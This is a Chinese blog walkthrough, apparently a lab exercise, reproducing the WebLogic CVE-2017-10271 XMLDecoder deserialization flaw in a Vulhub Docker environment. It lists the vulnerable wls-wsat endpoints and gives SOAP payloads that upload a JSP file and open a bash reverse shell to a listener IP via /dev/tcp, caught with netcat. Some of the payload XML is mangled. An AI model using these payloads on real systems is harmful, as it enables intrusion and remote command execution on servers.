CVE-2017-10271复现

一、漏洞解析
漏洞本质是由于wls组件使用了webservice来请求soap请求,所以构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。SOAP是web服务安全性内置协议,采用保密和身份验证规则集的方式。
二、环境
1、docker
2、Vulhub-master
3、Burpsuite、netcat
三、复现
1、打开docker #docker -v查看
2、安装docker-compose #yum install docker-compose
3、 到 https://github.com/vulhub/vulhub 下载vulhub的源码包,然后上传到靶机中。执行:
unzip vulhub-master.zip #解压zip
cd到解压目录下: #cd vulhub-master
注意:centos7使用unzip解压时,有可能解压不了,报错:Archive: vulhub-master.zip End-of-central-directory signature not found

解决办法:使用命令安装jar工具:yum -y install java-1.6.0-openjdk-devel
之后使用解压命令:jar xvf 要解压的文件名在这里插入图片描述

4、进入到CVE-2017-10271,执行以下命令:
docker-master build
docker-master up -d
 如果出现ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.doc问题,重启就完了。
在这里插入图片描述

5、执行docker ps查看是否开启成功
在这里插入图片描述

6、访问http://ip:7001 ,如果出现这个页面说明环境启动成功
在这里插入图片描述

7、访问http://靶机ip:7001//wls-wsat/CoordinatorPortType ,如果出现这个页面说明可能存在漏洞:
在这里插入图片描述

其它可用URL:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
8、使用burp来验证
访问http://靶机ip:7001//wls-wsat/CoordinatorPortType,抓包,将GET改为POST,然后插入构造的soap POC:
①上传
<soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/”>
soapenv:Header
<work:WorkContext xmlns:work=“http://bea.com/2004/06/soap/workarea/”>


servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp


<![CDATA[ <% out.print("test"); %> ]]>




</work:WorkContext>
</soapenv:Header>
soapenv:Body/
</soapenv:Envelope>
在这里插入图片描述

注意:报错415,需要修改Content-Type:text/xml;charset=utf-8
修改后,点击发送,上传成功:
在这里插入图片描述

②反弹shell
<soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/”>
soapenv:Header
<work:WorkContext xmlns:work=“http://bea.com/2004/06/soap/workarea/”>




/bin/bash


-c


bash -i >& /dev/tcp/192.168.3.125/21 0>&1
#/dev/tcp/监听机的ip/监听的端口




</work:WorkContext>
</soapenv:Header>
soapenv:Body/
</soapenv:Envelope>
攻击机监听:nc -lnvp 21

构造poc然后发送,反弹shell成功,执行命令id返回root:
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值